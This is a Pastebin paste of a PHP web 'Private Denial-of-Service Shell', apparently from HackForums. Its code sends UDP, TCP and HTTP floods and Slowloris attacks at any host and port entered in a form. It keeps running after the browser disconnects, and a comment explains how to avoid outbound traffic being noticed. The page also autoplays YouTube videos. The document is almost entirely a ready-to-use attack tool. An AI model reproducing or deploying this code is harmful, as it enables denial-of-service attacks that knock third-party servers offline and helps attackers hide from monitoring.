API tools faq
paste
3liteGamingChannel

Sweet PHP SHELL Supports all types

3liteGamingChannel
Feb 26th, 2014
279
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.97 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. if(isset($_GET['method']))
  3. {
  4. $bytes = 65000;
  5. /*
  6. * 65000 bytes is the around max packet size in
  7. * TCP and UDP
  8. *
  9. * lower ths to be secretive about the shell being on
  10. * the web server - you will have less chance of the
  11. * outbound packets being caught.
  12. */
  13.  
  14. if(empty($_GET['ip']) || empty($_GET['port']) || empty($_GET['length']))
  15. {
  16. exit("You've forgotten something.");
  17. }
  18.  
  19. if($_GET['method'] == "udp")
  20. {
  21. ignore_user_abort(true);
  22. set_time_limit(0);
  23.  
  24. ob_start();
  25. echo "Attack sent!";
  26. $s = ob_get_length();
  27.  
  28. header("Content-Length: {$s}");
  29. header("Content-Encoding: none");
  30. header("Connection: close");
  31.  
  32. ob_end_flush();
  33. ob_flush();
  34. flush();
  35.  
  36. if(session_id()) session_write_close();
  37.  
  38. $n = 0;
  39. $packet = '';
  40. do
  41. {
  42. switch($n)
  43. {
  44. case 0:
  45. $packet .= 'A';
  46. break;
  47.  
  48. case 1:
  49. $packet .= 'S';
  50. break;
  51.  
  52. case 2:
  53. $packet .= 'D';
  54. break;
  55.  
  56. case 3:
  57. $packet .= 'A';
  58. break;
  59. }
  60.  
  61. $n++;
  62. if($n == 4) $n = 0;
  63. } while(strlen($packet) != $bytes);
  64.  
  65. $running = true;
  66.  
  67. $runFor = strtotime('now') + $_GET['length'];
  68.  
  69. do
  70. {
  71. if(strtotime('now') > $runFor)
  72. {
  73. $running = false;
  74. }
  75. $sock = @fsockopen("udp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10);
  76.  
  77. if($sock)
  78. {
  79. fwrite($sock, $packet);
  80. fclose($sock);
  81. }
  82. else
  83. {
  84. $sock = @fsockopen("udp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10);
  85. fwrite($sock, $packet);
  86. }
  87. } while($running == true);
  88. }
  89. elseif($_GET['method'] == "slowloris")
  90. {
  91. ignore_user_abort(true);
  92. set_time_limit(0);
  93.  
  94. ob_start();
  95. echo "Attack sent!";
  96. $s = ob_get_length();
  97.  
  98. header("Content-Length: {$s}");
  99. header("Content-Encoding: none");
  100. header("Connection: close");
  101.  
  102. ob_end_flush();
  103. ob_flush();
  104. flush();
  105.  
  106. if(session_id()) session_write_close();
  107.  
  108. $header = array();
  109. $header[] = "GET / HTTP/1.1";
  110. $header[] = "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7";
  111. $header[] = "Host: {$_GET['ip']}";
  112. $header[] = "Keep-Alive: 900";
  113. $header[] = "Content-Length: " . mt_rand(100000, 1000000);
  114. $header[] = "Connection: keep-alive";
  115.  
  116. $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr);
  117.  
  118. if($sock)
  119. {
  120. fwrite($sock, implode("\r\n", $header));
  121.  
  122. $running = false;
  123. $runFor = strtotime('now') + $_GET['length'];
  124.  
  125. do
  126. {
  127. if(strtotime('now') > $runFor)
  128. {
  129. $running = false;
  130. }
  131.  
  132. if($sock)
  133. {
  134. fwrite($sock, '.');
  135. sleep(3);
  136. }
  137. else
  138. {
  139. $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr);
  140. fwrite($sock, implode("\r\n", $header));
  141. }
  142. } while($running == true);
  143. }
  144. }
  145. elseif($_GET['method'] == "tcp")
  146. {
  147. ignore_user_abort(true);
  148. set_time_limit(0);
  149.  
  150. ob_start();
  151. echo "Attack sent!";
  152. $s = ob_get_length();
  153.  
  154. header("Content-Length: {$s}");
  155. header("Content-Encoding: none");
  156. header("Connection: close");
  157.  
  158. ob_end_flush();
  159. ob_flush();
  160. flush();
  161.  
  162. if(session_id()) session_write_close();
  163.  
  164. $n = 0;
  165. $packet = '';
  166. do
  167. {
  168. switch($n)
  169. {
  170. case 0:
  171. $packet .= 'A';
  172. break;
  173.  
  174. case 1:
  175. $packet .= 'S';
  176. break;
  177.  
  178. case 2:
  179. $packet .= 'D';
  180. break;
  181.  
  182. case 3:
  183. $packet .= 'A';
  184. break;
  185. }
  186.  
  187. $n++;
  188. if($n == 4) $n = 0;
  189. } while(strlen($packet) != $bytes);
  190.  
  191. $running = true;
  192.  
  193. $runFor = strtotime('now') + $_GET['length'];
  194.  
  195. do
  196. {
  197. if(strtotime('now') > $runFor)
  198. {
  199. $running = false;
  200. }
  201. $sock = @fsockopen("tcp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10);
  202.  
  203. if($sock)
  204. {
  205. fwrite($sock, $packet);
  206. fclose($sock);
  207. }
  208. else
  209. {
  210. $sock = @fsockopen("tcp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10);
  211. fwrite($sock, $packet);
  212. }
  213. } while($running == true);
  214. }
  215. elseif($_GET['method'] == "http")
  216. {
  217. ignore_user_abort(true);
  218. set_time_limit(0);
  219.  
  220. ob_start();
  221. echo "Attack sent!";
  222. $s = ob_get_length();
  223.  
  224. header("Content-Length: {$s}");
  225. header("Content-Encoding: none");
  226. header("Connection: close");
  227.  
  228. ob_end_flush();
  229. ob_flush();
  230. flush();
  231.  
  232. if(session_id()) session_write_close();
  233.  
  234. $header = array();
  235. $header[] = "GET / HTTP/1.1";
  236. $header[] = "Host: {$_GET['ip']}";
  237. $header[] = "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7";
  238. $header[] = "Keep-Alive: 300";
  239. $header[] = "Content-Length: " . mt_rand(100000, 1000000);
  240. $header[] = "Connection: keep-alive";
  241.  
  242. $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr);
  243.  
  244. if($sock)
  245. {
  246. fwrite($sock, implode("\r\n", $header));
  247.  
  248. $running = false;
  249. $runFor = strtotime('now') + $_GET['length'];
  250.  
  251. do
  252. {
  253. if(strtotime('now') > $runFor)
  254. {
  255. $running = false;
  256. }
  257.  
  258. if($sock)
  259. {
  260. fwrite($sock, '.');
  261. fclose($sock);
  262. sleep(3);
  263. }
  264. else
  265. {
  266. $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr);
  267. fwrite($sock, implode("\r\n", $header));
  268. }
  269. } while($running == true);
  270. }
  271. }
  272. }
  273. ?>
  274.  
  275. <!DOCTYPE html>
  276. <html>
  277. <head>
  278. <meta charset="utf-8">
  279. <meta name="author" content="ASDA">
  280. <meta name="robots" content="noindex, nofollow">
  281. <title>&nbsp;Private Denial-of-Service Shell | Created by ASDA | HackForums.net | </title>
  282.  
  283. <style>
  284. html, body
  285. {
  286. height: 100%;
  287. cursor: none;
  288. background: #000;
  289. color: #66ff33;
  290. overflow: hidden;
  291. }
  292.  
  293. h1
  294. {
  295. text-align: center;
  296. font-size: 50px;
  297. }
  298.  
  299. #barX
  300. {
  301. background: #66ff33;
  302. left: 0;
  303. top: 0;
  304. position: absolute;
  305. width: 1px;
  306. height: 100%;
  307. z-index: 1000;
  308. }
  309.  
  310. #barY
  311. {
  312. background: #66ff33;
  313. left: 0;
  314. top: 0;
  315. position: absolute;
  316. width: 100%;
  317. height: 1px;
  318. z-index: 1000;
  319. }
  320.  
  321. input
  322. {
  323. cursor: none;
  324. border: 1px solid #11ff00;
  325. margin-bottom: 20px;
  326. }
  327.  
  328. form
  329. {
  330. width: 50px;
  331. margin: auto;
  332. }
  333.  
  334. label
  335. {
  336. display: block;
  337. }
  338.  
  339. iframe
  340. {
  341. display: none;
  342. visibility: hidden;
  343. }
  344.  
  345. </style>
  346. </head>
  347.  
  348. <body>
  349. <div id="barY"></div>
  350. <div id="barX"></div>
  351.  
  352. <div id="doColours"></div>
  353.  
  354. <form action="<?php echo $_SERVER["SCRIPT_NAME"]; ?>" method="GET">
  355. <label for="ip">Host:</label>
  356. <input type="text" name="ip" id="ip">
  357.  
  358. <label for="port">Port:</label>
  359. <input type="text" name="port" id="port">
  360.  
  361. <label for="length">Length:</label>
  362. <input type="text" name="length" id="length">
  363.  
  364. <label for="method">Method:</label>
  365. <select name="method" id="method">
  366. <option value="slowloris">Slowloris</option>
  367. <option value="udp">UDP Flood</option>
  368. <option value="tcp">TCP Flood</option>
  369. <option value="http">HTTP Flood</option>
  370. </select>
  371.  
  372. <br><br>
  373.  
  374. <input type="submit" value="ATTACK!">
  375. </form>
  376.  
  377.  
  378. <div id="youtube"></div>
  379. <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js"></script>
  380. <script type="text/javascript">
  381. $(document).ready(function(){
  382. var title = document.title;
  383. setInterval(function(){title = title.substring(1, title.length) + title.substring(0, 1);document.title = title;}, 300);
  384.  
  385. $("body").bind('mousemove', function(evt) {
  386. $("#barY").css({
  387. "top": evt.pageY + 10 + "px"
  388. });
  389. $("#barX").css({
  390. "left": evt.pageX + 10 + "px"
  391. });
  392. });
  393.  
  394. var youtubea = new Array();
  395. youtubea[0] = "<iframe src=\"https://youtube.com/embed/zeIjmvZZ_SQ?autoplay=1\" frameborder=\"0\"></iframe>";
  396. youtubea[1] = "<iframe src=\"https://youtube.com/embed/-ieJtn73e1w?autoplay=1\" frameborder=\"0\"></iframe>";
  397. youtubea[2] = "<iframe src=\"https://youtube.com/embed/w1bRniqs774?autoplay=1\" frameborder=\"0\"></iframe>";
  398. youtubea[3] = "<iframe src=\"https://youtube.com/embed/GqUN76-_Djg?autoplay=1\" frameborder=\"0\"></iframe>";
  399. youtubea[4] = "<iframe src=\"https://youtube.com/embed/UDzNq1s7dAE?autoplay=1\" frameborder=\"0\"></iframe>";
  400. youtubea[5] = "<iframe src=\"https://youtube.com/embed/DC9xwwmyS70?autoplay=1\" frameborder=\"0\"></iframe>";
  401. youtubea[6] = "<iframe src=\"https://youtube.com/embed/liYyEqlvG1Y?autoplay=1#t=17s\" frameborder=\"0\"></iframe>";
  402. youtubea[7] = "<iframe src=\"https://youtube.com/embed/K1VLaXoRRdk?autoplay=1\" frameborder=\"0\"></iframe>";
  403. youtubea[8] = "<iframe src=\"https://youtube.com/embed/EZxeJV-G9kg?autoplay=1\" frameborder=\"0\"></iframe>";
  404. youtubea[9] = "<iframe src=\"https://youtube.com/embed/JRwXku3nM1c?autoplay=1\" frameborder=\"0\"></iframe>";
  405. youtubea[10] = "<iframe src=\"https://youtube.com/embed/oKpPd2hDrE4?autoplay=1\" frameborder=\"0\"></iframe>";
  406. youtubea[11] = "<iframe src=\"https://youtube.com/embed/3Rd0LHQHjWg?autoplay=1\" frameborder=\"0\"></iframe>";
  407. youtubea[12] = "<iframe src=\"https://youtube.com/embed/nuno2jOwOjo?autoplay=1\" frameborder=\"0\"></iframe>";
  408. youtubea[13] = "<iframe src=\"https://youtube.com/embed/xLho8rMQpoI?autoplay=1\" frameborder=\"0\"></iframe>";
  409.  
  410. var rand = Math.floor(Math.random() * (youtubea.length + 1));
  411. $('#youtube').html(youtubea[rand]);
  412.  
  413. function doColour(a){setInterval(function(){for(var b=0;b<a.length;b++){$("#letter"+b).css({color:colour[b]})}for(var b=0;b<colour.length;b++){colour[b-1]=colour[b]}colour[colour.length-1]=colour[-1]},50)}function initColours(a){var b="\x41\x53\x44\x41\x27\x73\x20\x50\x72\x69\x76\x61\x74\x65\x20\x53\x68\x65\x6C\x6C".split("");var c="<h1>";$.each(b,function(a,b){c+="<span id='letter"+a+"'>"+b+"</span>"});c+="</h1>";$("#doColours").html(c);doColour(b);var d=1;setInterval(function(){while(colour.length<b.length){colour=colour.concat(colour)}d=Math.floor(Math.random()*colours.length);colour=colours[d]},5e3)}colours=new Array;colours[0]=new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");colours[1]=new Array("#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00");colours[2]=new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00");colours[3]=new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");colours[4]=new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");colours[5]=new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF");colours[6]=new Array("#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00");colour=colours[4];initColours();
  414.  
  415. });
  416. </script>
  417. </body>
  418. </html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!